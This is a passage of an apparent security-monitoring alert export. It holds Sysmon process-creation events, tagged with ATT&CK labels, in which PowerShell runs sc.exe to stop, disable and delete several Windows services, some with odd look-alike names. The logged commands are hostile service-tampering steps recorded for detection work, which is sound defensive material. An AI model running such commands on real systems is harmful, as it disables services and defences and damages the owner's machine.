Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.838"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001085482e00}"",""processId"":""4728"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.306",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.784 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108b452e00} +ProcessId: 7600 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.787867700Z"",""eventRecordID"":""3422"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.784\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00108b452e00}\r\nProcessId: 7600\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.784"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-00108b452e00}"",""processId"":""7600"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.264",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.765 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001025442e00} +ProcessId: 4788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Sncryption Media Playeq"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.767882900Z"",""eventRecordID"":""3421"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.765\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001025442e00}\r\nProcessId: 4788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.765"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001025442e00}"",""processId"":""4788"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Sncryption Media Playeq\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.222",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.729 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001063422e00} +ProcessId: 880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.731706200Z"",""eventRecordID"":""3419"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.729\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001063422e00}\r\nProcessId: 880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.729"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-001063422e00}"",""processId"":""880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.135",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.672 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010e63f2e00} +ProcessId: 7336 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.674598600Z"",""eventRecordID"":""3416"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.672\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010e63f2e00}\r\nProcessId: 7336\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.672"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010e63f2e00}"",""processId"":""7336"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop RpcEptManger"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.063",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.643 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010503e2e00} +ProcessId: 7248 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.646651600Z"",""eventRecordID"":""3414"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.643\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010503e2e00}\r\nProcessId: 7248\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.643"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010503e2e00}"",""processId"":""7248"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Samserver"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.028",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.627 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00107e3d2e00} +ProcessId: 7212 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Samserver +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Samserver",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.630436900Z"",""eventRecordID"":""3413"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.627\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-00107e3d2e00}\r\nProcessId: 7212\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Samserver\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 